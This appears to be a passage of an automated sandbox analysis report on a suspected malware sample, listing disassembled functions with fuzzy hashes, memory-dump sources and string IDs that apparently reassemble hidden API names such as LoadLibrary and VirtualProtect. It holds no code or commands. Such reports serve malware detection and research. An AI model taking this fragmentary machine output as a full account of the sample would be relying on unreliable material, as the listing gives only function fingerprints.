                                • Opcode Fuzzy Hash: 19555410c92eae7b4f59360e2c593c7c58fd660cfd34fd1e31098275a1338e3b
                                • Instruction Fuzzy Hash: E922A0B0D082698BEB20CB24CC58BEABBB6EF85314F0480F9D44DA7681D7795AC5CF55
                                Function 02961803 Relevance: 54.7, APIs: 1, Strings: 30, Instructions: 489COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: 6A2P$6I@6$F2=:$JMI:$L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-1044622014
                                • Opcode ID: 8ce12532de46d85089ed6e46d883c813e0101caa365115f1e62fcb78115eeea1
                                • Instruction ID: fd48d58170245de9497efe6529a2a6018b6c66d9bb7aedeb6ea851ab40724f05
                                • Opcode Fuzzy Hash: 8ce12532de46d85089ed6e46d883c813e0101caa365115f1e62fcb78115eeea1
                                • Instruction Fuzzy Hash: 6D1228B1D052A48AE720CB64DC587EABBB5EF91310F0441FAC44D67281D67A4FD6CFA2
                                Function 0296191D Relevance: 54.7, APIs: 1, Strings: 30, Instructions: 489COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: 6A2P$6I@6$F2=:$JMI:$L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-1044622014
                                • Opcode ID: 6c474c9d6309837d7c813467b8a8954442faff26ab2dd0e1c278812940fe72b7
                                • Instruction ID: bfc017c3375aa86a34b404ed803ea53bd1403ae788b44af8284f14c122ece478
                                • Opcode Fuzzy Hash: 6c474c9d6309837d7c813467b8a8954442faff26ab2dd0e1c278812940fe72b7
                                • Instruction Fuzzy Hash: 361217B1D052A48AE720CB64DC587EABBB5EF91310F0441FAC44D67281D77A4ED6CFA2
                                Function 02961236 Relevance: 53.2, APIs: 1, Strings: 29, Instructions: 673COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: 6A2P$F2=:$JMI:$L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-3437435223
                                • Opcode ID: e287edb47a025dfa8513dadcb44eaabaa558f895183d370b382917b707c1d64d
                                • Instruction ID: e8e154863e9c36c158413c78ef44961efbe953c248123be65b800b10748f5a40
                                • Opcode Fuzzy Hash: e287edb47a025dfa8513dadcb44eaabaa558f895183d370b382917b707c1d64d
                                • Instruction Fuzzy Hash: 7C52D1B1D056A88FEB24CB24DC58BEABBB5AF85310F0440FAC84D67281D6795EC5CF91
                                Function 02961858 Relevance: 53.0, APIs: 1, Strings: 29, Instructions: 464COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: 6A2P$F2=:$JMI:$L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-3437435223
                                • Opcode ID: bdd6c7eead58c43e009a173631e87bf8b435cacde9c8e814a3ff91392f1d260d
                                • Instruction ID: e50285f70be7219a8a614a6f69bd4df58a07ddbac1c737a6c93b94e215757164
                                • Opcode Fuzzy Hash: bdd6c7eead58c43e009a173631e87bf8b435cacde9c8e814a3ff91392f1d260d
                                • Instruction Fuzzy Hash: 020218B1D092A48AE720CB64DC587EABBB5EF91310F0441FAC44D67281D67A4FD5CFA2
                                Function 029618D4 Relevance: 52.9, APIs: 1, Strings: 29, Instructions: 443COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: 6A2P$F2=:$JMI:$L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-3437435223
                                • Opcode ID: 19b6ed05bf28c5367eba6ff917ff367c779b100d6bd51da910ee435b0cfef367
                                • Instruction ID: 7e10ecede2c2898626ef05d7306b0555679b6bb717c84eb6eff9071590a8569b
                                • Opcode Fuzzy Hash: 19b6ed05bf28c5367eba6ff917ff367c779b100d6bd51da910ee435b0cfef367
                                • Instruction Fuzzy Hash: F40229B1D082A48AE7208764DC587EA7FB5EF91310F0441FAC48D67281D67E4BD6CFA2
                                Function 029619D4 Relevance: 52.9, APIs: 1, Strings: 29, Instructions: 421COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: 6A2P$F2=:$JMI:$L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-3437435223
                                • Opcode ID: 96948fa9488b29b987c3077c0ae36cc61cd63f14841f2dd55fc02dbc7d1ad921
                                • Instruction ID: 32b4b2d96b06ff66172ebf3330edd815c132ebd410c216a719f44140a9d49e41
                                • Opcode Fuzzy Hash: 96948fa9488b29b987c3077c0ae36cc61cd63f14841f2dd55fc02dbc7d1ad921
                                • Instruction Fuzzy Hash: EEF10671D092A48BE7208764DC587EABFB5AF91310F0440FAC84D67281D67A5FD6CFA2
                                Function 029619CB Relevance: 52.9, APIs: 1, Strings: 29, Instructions: 419COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: 6A2P$F2=:$JMI:$L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-3437435223
                                • Opcode ID: 7feecd47ef524e7802b5d4867b31cab3804689f910d934b41af9d4f821d4ee77
                                • Instruction ID: 18bf6c88944523e1acfef5c39e3d099e716b566e9fe0d771e8772516229ab6b3
                                • Opcode Fuzzy Hash: 7feecd47ef524e7802b5d4867b31cab3804689f910d934b41af9d4f821d4ee77
                                • Instruction Fuzzy Hash: C1F10671D092A48BE7208764DC587EABFB5AF91310F0440FAC44D67281D67A5FD6CFA2
                                Function 02961751 Relevance: 52.9, APIs: 1, Strings: 29, Instructions: 414COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: 6A2P$F2=:$JMI:$L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-3437435223
                                • Opcode ID: 1035d3dd130e00952cec775d506ed0d9aaa0f903075b395e960ea168f98e97eb
                                • Instruction ID: 35e5ab084cd7be393b2a020972a8eec9c2981d8cdb03ca4716ba6274a4328532
                                • Opcode Fuzzy Hash: 1035d3dd130e00952cec775d506ed0d9aaa0f903075b395e960ea168f98e97eb
                                • Instruction Fuzzy Hash: 30F11971D092A48AE7208764DC587EABFB5AF91310F0440FAC48D67281D67E5BD6CFA2
                                Function 029617BB Relevance: 52.9, APIs: 1, Strings: 29, Instructions: 407COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: 6A2P$F2=:$JMI:$L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-3437435223
                                • Opcode ID: 8c9544f18fb1405399ccadd22fe28842a1bc6f611cdff5d8b8e79ec41441f148
                                • Instruction ID: 5423523a47fa3e50a9e9bde5b13aecf503817ebbe0d84aa13055033b614c3309
                                • Opcode Fuzzy Hash: 8c9544f18fb1405399ccadd22fe28842a1bc6f611cdff5d8b8e79ec41441f148
                                • Instruction Fuzzy Hash: 89F119B1D092A48AE7208764DC587EABFB5AF91310F0440FAC44D67281D67E5FD6CFA2
                                Function 0296167D Relevance: 52.9, APIs: 1, Strings: 29, Instructions: 388COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: F2=:$JMI:$L$L$P$Q$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-1625077675
                                • Opcode ID: 7f1b33414e2a7791d3d800da4392e6b715e5d862f5480093d9c0330ca0bba250
                                • Instruction ID: 047c1a53214b774ccd5f0dc55c26d04468d234c399aa2b1b25797c2473daef5e
                                • Opcode Fuzzy Hash: 7f1b33414e2a7791d3d800da4392e6b715e5d862f5480093d9c0330ca0bba250
                                • Instruction Fuzzy Hash: DFE119B1D092A48AE7208764DC187EABFB5AF91310F0441FAC48D67681D67E4FD5CFA2
                                Function 0296123B Relevance: 51.1, APIs: 1, Strings: 28, Instructions: 384COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: F2=:$JMI:$L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-4161312708
                                • Opcode ID: c79cec867c89a9c2a28cdd1acf59e103ce9dc7b7538d34d528461ed01ed3e7e3
                                • Instruction ID: 0e0e23d670f01d3500df2a0f3c1637fa78a805c859d8d0aa73865cbc9e2feab3
                                • Opcode Fuzzy Hash: c79cec867c89a9c2a28cdd1acf59e103ce9dc7b7538d34d528461ed01ed3e7e3
                                • Instruction Fuzzy Hash: 04E13AB1D092A48AE7208764DC58BEA7FB5AF91310F0441FAC84D67281D67E4FD5CFA2
                                Function 02961261 Relevance: 51.1, APIs: 1, Strings: 28, Instructions: 373COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: F2=:$JMI:$L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-4161312708
                                • Opcode ID: 57c12ce5f3dda49e19c7de8a25667848688963a211dcf80c906533ae7ee2d5fe
                                • Instruction ID: 4639fc3d27c4c8c1971e834b8518429425903c79d60c0106529cfbf85fc9f3e8
                                • Opcode Fuzzy Hash: 57c12ce5f3dda49e19c7de8a25667848688963a211dcf80c906533ae7ee2d5fe
                                • Instruction Fuzzy Hash: 88E119B1D092A48AE7208764DC587EABFB5AF91310F0441FAC84D67281D67E4FD5CFA2
                                Function 02961D82 Relevance: 51.1, APIs: 1, Strings: 28, Instructions: 370COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: F2=:$JMI:$L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-4161312708
                                • Opcode ID: bc71020153b4cc03191988b72ad6a6e48db4408f430abbc68f194394c01f58be
                                • Instruction ID: 01d1e79294988f08435f6c0245dca90a19addb368255d04eebb25083565b2e0d
                                • Opcode Fuzzy Hash: bc71020153b4cc03191988b72ad6a6e48db4408f430abbc68f194394c01f58be
                                • Instruction Fuzzy Hash: 22E117B1D092A48AE7208764DC587EABFB5AF91310F0441FAC84D67281D67A4FD5CFA2
                                Function 02961ACF Relevance: 51.1, APIs: 1, Strings: 28, Instructions: 368COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: F2=:$JMI:$L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-4161312708
                                • Opcode ID: 562ee0a9e16468c19f621318af301135f1ac1e8067ae1d4847febf4028a94b25
                                • Instruction ID: a78a3b80115a7101d7063a0e83ae7a163adac27f7e1d5f7f425525330b9c9b92
                                • Opcode Fuzzy Hash: 562ee0a9e16468c19f621318af301135f1ac1e8067ae1d4847febf4028a94b25
                                • Instruction Fuzzy Hash: 16E118B1D082A48AE7208764DC487EABFB5AF91310F0441FAC84D67281D67E4FD5CFA2
                                Function 02961B01 Relevance: 51.1, APIs: 1, Strings: 28, Instructions: 368COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: F2=:$JMI:$L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-4161312708
                                • Opcode ID: b370238d9c1c6155e62db8f23c36a453e78173aa37261168ab0ed93b3aa38028
                                • Instruction ID: 91102a97f7a3cbf82c3abf8175a886db3185fb1f7bada92ac5460fdd4d9cd9e3
                                • Opcode Fuzzy Hash: b370238d9c1c6155e62db8f23c36a453e78173aa37261168ab0ed93b3aa38028
                                • Instruction Fuzzy Hash: EAE118B1D092A48AE7208764DC587EABFB5AF91310F0440FAC84D67281D67E4FD5CFA2
                                Function 02961B26 Relevance: 51.1, APIs: 1, Strings: 28, Instructions: 368COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: F2=:$JMI:$L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-4161312708
                                • Opcode ID: eee8b2b694be5c309b6d826c2faae360534674e72ccf22f1e780ff340de53992
                                • Instruction ID: 064e50fef4fd8482fa6f8a05c8644f483d5ca0d24396488b9ccd6b5abeee0120
                                • Opcode Fuzzy Hash: eee8b2b694be5c309b6d826c2faae360534674e72ccf22f1e780ff340de53992
                                • Instruction Fuzzy Hash: D1E118B1D082A48AE7208764DC487EABFB5AF91310F0440FAC84D67281D67E4FD5CFA2
                                Function 0296127A Relevance: 51.1, APIs: 1, Strings: 28, Instructions: 367COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: F2=:$JMI:$L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-4161312708
                                • Opcode ID: 7988984f3dc47c4002ca8669797a1ad53eabb78dac11d9b075d46dd1f3a7cd42
                                • Instruction ID: 225a2b7df921d0a6d6184e751bf48fd11195b27a668c3b463601ea67b1b4b96c
                                • Opcode Fuzzy Hash: 7988984f3dc47c4002ca8669797a1ad53eabb78dac11d9b075d46dd1f3a7cd42
                                • Instruction Fuzzy Hash: 39E128B1D092A48AE7208764DC587EABFB5AF91310F0441FAC84D67281D67E4FD5CFA2
                                Function 02961E67 Relevance: 51.1, APIs: 1, Strings: 28, Instructions: 309COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: F2=:$JMI:$L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 544645111-4161312708
                                • Opcode ID: 1ebc30513771bddca9ba43c076931fed6e5ff9ddaaded22cb6b94fd2e985b934
                                • Instruction ID: 0e376c73619000ded8e696b270b04555b36663f2b434fbae0dfdfd0e6782e5c4
                                • Opcode Fuzzy Hash: 1ebc30513771bddca9ba43c076931fed6e5ff9ddaaded22cb6b94fd2e985b934
                                • Instruction Fuzzy Hash: 84C1F771D086A88AE720C764DC587EABFB6AF95310F0440F9C84C67281D67A1FD5CFA2
                                Function 02961E91 Relevance: 51.0, APIs: 1, Strings: 28, Instructions: 298COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: F2=:$JMI:$L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 544645111-4161312708
                                • Opcode ID: 59a0f888a9df304dc0e7c807ba1b59d0da9cd931a960d0f62add6b4897108e4c
                                • Instruction ID: 76c6b14e936ad9121e443b3f3eaa9ab231ad884e3ad6d4aa4777d2cb6c7e5bd6
                                • Opcode Fuzzy Hash: 59a0f888a9df304dc0e7c807ba1b59d0da9cd931a960d0f62add6b4897108e4c
                                • Instruction Fuzzy Hash: 2FC1E671D086A48AE720C764DC587DABFB6AF91310F0441F9C88C67281D67A1FD5CFA6
                                Function 02923A08 Relevance: 49.4, APIs: 2, Strings: 26, Instructions: 446libraryCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryW.KERNELBASE(?), ref: 02924C5D
                                • LoadLibraryW.KERNELBASE(?), ref: 02924C7A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: LibraryLoad
                                • String ID: =K:3$L$L$L$L$W$W$[P$a$a$a$a$b$b$d$d$i$i$o$o$r$r$r$r$y$y
                                • API String ID: 1029625771-1399067253
                                • Opcode ID: 5136844cc4baa6288b4b016ff199dcc20e44e2345badd248cd282e038e43aa6c
                                • Instruction ID: d184454afece2de9991f7b9938dc62eae39b4255f16dce9c35feac04c5b9e938
                                • Opcode Fuzzy Hash: 5136844cc4baa6288b4b016ff199dcc20e44e2345badd248cd282e038e43aa6c
                                • Instruction Fuzzy Hash: BB0225A1D046A48BFB258B24CC44BEABB75FF91300F0481FAC44DA7281DA794BC5CF66
                                Function 02923831 Relevance: 49.4, APIs: 2, Strings: 26, Instructions: 443libraryCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryW.KERNELBASE(?), ref: 02924C5D
                                • LoadLibraryW.KERNELBASE(?), ref: 02924C7A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: LibraryLoad
                                • String ID: =K:3$L$L$L$L$W$W$[P$a$a$a$a$b$b$d$d$i$i$o$o$r$r$r$r$y$y
                                • API String ID: 1029625771-1399067253
                                • Opcode ID: cb30956cddb763a2ec060f4b16e902bf384e2be54539d29310f86b754b994253
                                • Instruction ID: fb162758af7a8cb9692fb64da501013eed427e29b14b8a674a374ac8ab228b90
                                • Opcode Fuzzy Hash: cb30956cddb763a2ec060f4b16e902bf384e2be54539d29310f86b754b994253
                                • Instruction Fuzzy Hash: 3602F761D086A48BF7258B24DC44BAA7B75FF91300F0490F9C48DA7285DA7A4FC5CF66
                                Function 02923840 Relevance: 49.4, APIs: 2, Strings: 26, Instructions: 432libraryCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryW.KERNELBASE(?), ref: 02924C5D
                                • LoadLibraryW.KERNELBASE(?), ref: 02924C7A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: LibraryLoad
                                • String ID: =K:3$L$L$L$L$W$W$[P$a$a$a$a$b$b$d$d$i$i$o$o$r$r$r$r$y$y
                                • API String ID: 1029625771-1399067253
                                • Opcode ID: 8a52337a33631ce5c80dfe416444cee649e29e228a02ef3f1201daa9f7522981
                                • Instruction ID: d5a6742c3ce53ee61452d80af223449a71c8a68ed9bb2ad1095218c6826cbbaa
                                • Opcode Fuzzy Hash: 8a52337a33631ce5c80dfe416444cee649e29e228a02ef3f1201daa9f7522981
                                • Instruction Fuzzy Hash: 8E02F661D086A88BF7258B24DC447AA7BB5FF91300F0490F9C48DA7285DA7A4FC5CF66
                                Function 0041C24C Relevance: 44.1, APIs: 1, Strings: 24, Instructions: 317memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000020,?), ref: 0041D1C7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: E$L$L$P$R$W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                • API String ID: 544645111-1986278618
                                • Opcode ID: b090434325a858ee1c24148d1302dd21144cba8dc5716073d56a8d18fe1264aa
                                • Instruction ID: 23123e0cd56b6c439899f8556c250b4bbb9f1384fc39511248e3eab8c9194c82
                                • Opcode Fuzzy Hash: b090434325a858ee1c24148d1302dd21144cba8dc5716073d56a8d18fe1264aa
                                • Instruction Fuzzy Hash: D8C126B1C042A48AF7208715DC88BFBBBB5EB41314F0481FAD84D66281D6BD5FC58F66
                                Function 0292628B Relevance: 41.0, APIs: 1, Strings: 26, Instructions: 542COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: >NN$L$L$L$L$S$W$W$a$a$a$a$b$b$d$d$i$i$o$o$r$r$r$r$y$y
                                • API String ID: 0-3879096502
                                • Opcode ID: e881999b1ed43ab7143cbdc950c9226169e289cd193abdeb3e7eae512af5fe19
                                • Instruction ID: d79ec0364c571a62af5ead70ba3904561431181fcf8dfab9f3dbed68b76fd190
                                • Opcode Fuzzy Hash: e881999b1ed43ab7143cbdc950c9226169e289cd193abdeb3e7eae512af5fe19
                                • Instruction Fuzzy Hash: 9322E4A1D142689AF720CA24DC44BAAB779FF91314F0481FAD44CAB684D67E4FC5CF62
                                Function 0296E590 Relevance: 39.7, APIs: 1, Strings: 25, Instructions: 717COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: E$L$L$P$W$_Q$a$a$b$c$d$e$i$i$j@h$o$o$r$r$r$s$s$t$x$y
                                • API String ID: 0-3027466465
                                • Opcode ID: f96828ec877bb1996306ece7141a2de6becad934d2914d8ea004012475594c04
                                • Instruction ID: b1da2f7456c639fe745001d362cf316c06aa45f34f8405c8ebe1132a2a9fd362
                                • Opcode Fuzzy Hash: f96828ec877bb1996306ece7141a2de6becad934d2914d8ea004012475594c04
                                • Instruction Fuzzy Hash: 7952DEB5D082688BEB248B24DC48BFABBB5EF81310F0481FAD84D67681D7395AC5CF51
                                Function 029264D4 Relevance: 39.6, APIs: 1, Strings: 25, Instructions: 598COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$L$L$S$W$W$a$a$a$a$b$b$d$d$i$i$o$o$r$r$r$r$y$y
                                • API String ID: 0-433306928
                                • Opcode ID: a287472b6b1289fc704edc89d1c75ffd0620fe808409bf2921cc3b80dccf8ad0
                                • Instruction ID: d4a89a2991eafe5cdbf23090c9f35c711a6628e3c9fd141693aa58876c59f600
                                • Opcode Fuzzy Hash: a287472b6b1289fc704edc89d1c75ffd0620fe808409bf2921cc3b80dccf8ad0
                                • Instruction Fuzzy Hash: A132E1A1D142689AF720CB24DC44BAABB79FF90314F0481FAD54CA7684D67A4FC5CF62
                                Function 029262A6 Relevance: 39.5, APIs: 1, Strings: 25, Instructions: 534COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$L$L$S$W$W$a$a$a$a$b$b$d$d$i$i$o$o$r$r$r$r$y$y
                                • API String ID: 0-433306928
                                • Opcode ID: 9f57e03294e69de9fd208771dc716e6418ab55c731ebc972fe8970e010c3b31c
                                • Instruction ID: dc1c136d668db221d6279a27a0128ee9205bb3f71530f00ebda6b7747e5ca334
                                • Opcode Fuzzy Hash: 9f57e03294e69de9fd208771dc716e6418ab55c731ebc972fe8970e010c3b31c
                                • Instruction Fuzzy Hash: 6322E4A1D142689AF720CA24DC44BAAB779FF91310F0481FAD44CAB684D67E4FC5CF62
                                Function 029262F8 Relevance: 39.5, APIs: 1, Strings: 25, Instructions: 516COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$L$L$S$W$W$a$a$a$a$b$b$d$d$i$i$o$o$r$r$r$r$y$y
                                • API String ID: 0-433306928
